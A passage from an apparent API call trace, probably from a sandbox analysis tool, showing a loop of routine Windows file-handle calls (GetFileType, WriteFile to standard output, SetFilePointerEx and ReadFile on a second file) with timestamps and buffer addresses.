(_FileHandle=1) returned 0x50 [0216.881] GetFileType (hFile=0x50) returned 0x1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] GetFileType (hFile=0x50) returned 0x1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] GetFileType (hFile=0x50) returned 0x1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] GetFileType (hFile=0x50) returned 0x1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] GetFileType (hFile=0x50) returned 0x1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.882] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.882] _get_osfhandle (_FileHandle=1) returned 0x50 
[0216.882] GetFileType (hFile=0x50) returned 0x1 [0216.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.882] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.882] GetFileType (hFile=0x50) returned 0x1 [0216.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.882] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.882] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.882] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.882] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.882] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.882] GetFileType (hFile=0x50) returned 0x1 [0216.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.882] GetFileType (hFile=0x50) returned 0x1 [0216.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.882] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] GetFileType (hFile=0x50) returned 0x1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, 
lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] GetFileType (hFile=0x50) returned 0x1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] GetFileType (hFile=0x50) returned 0x1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] GetFileType (hFile=0x50) returned 0x1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] GetFileType (hFile=0x50) returned 0x1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] GetFileType (hFile=0x50) returned 0x1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: 
lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.884] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.884] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.884] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.884] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] GetFileType (hFile=0x50) returned 0x1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] GetFileType (hFile=0x50) returned 0x1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] GetFileType (hFile=0x50) returned 0x1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] GetFileType (hFile=0x50) returned 0x1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] GetFileType (hFile=0x50) returned 0x1 [0216.884] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0216.885] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] GetFileType (hFile=0x50) returned 0x1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] GetFileType (hFile=0x50) returned 0x1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] GetFileType (hFile=0x50) returned 0x1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.885] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.885] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.885] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.885] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] 
GetFileType (hFile=0x50) returned 0x1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] GetFileType (hFile=0x50) returned 0x1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] GetFileType (hFile=0x50) returned 0x1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] GetFileType (hFile=0x50) returned 0x1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] GetFileType (hFile=0x50) returned 0x1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] GetFileType (hFile=0x50) returned 0x1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 
[0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] GetFileType (hFile=0x50) returned 0x1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] GetFileType (hFile=0x50) returned 0x1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.887] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.887] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.887] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.887] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] GetFileType (hFile=0x50) returned 0x1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] GetFileType (hFile=0x50) returned 0x1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] GetFileType (hFile=0x50) returned 0x1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] GetFileType (hFile=0x50) returned 0x1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] GetFileType (hFile=0x50) returned 0x1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] GetFileType (hFile=0x50) returned 0x1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] GetFileType (hFile=0x50) returned 0x1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] GetFileType (hFile=0x50) returned 0x1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.888] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.888] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] GetFileType (hFile=0x50) returned 0x1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] GetFileType (hFile=0x50) returned 0x1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] GetFileType (hFile=0x50) returned 0x1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] GetFileType (hFile=0x50) returned 0x1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] GetFileType 
(hFile=0x50) returned 0x1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] GetFileType (hFile=0x50) returned 0x1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] GetFileType (hFile=0x50) returned 0x1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] GetFileType (hFile=0x50) returned 0x1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.889] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.889] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.889] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.889] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.889] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] GetFileType (hFile=0x50) returned 0x1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] GetFileType (hFile=0x50) returned 0x1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] GetFileType (hFile=0x50) returned 0x1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] GetFileType (hFile=0x50) returned 0x1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] GetFileType (hFile=0x50) returned 0x1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] GetFileType (hFile=0x50) returned 0x1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, 
lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] GetFileType (hFile=0x50) returned 0x1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] GetFileType (hFile=0x50) returned 0x1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.890] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.890] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] GetFileType (hFile=0x50) returned 0x1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] GetFileType (hFile=0x50) returned 0x1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] GetFileType (hFile=0x50) returned 0x1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 
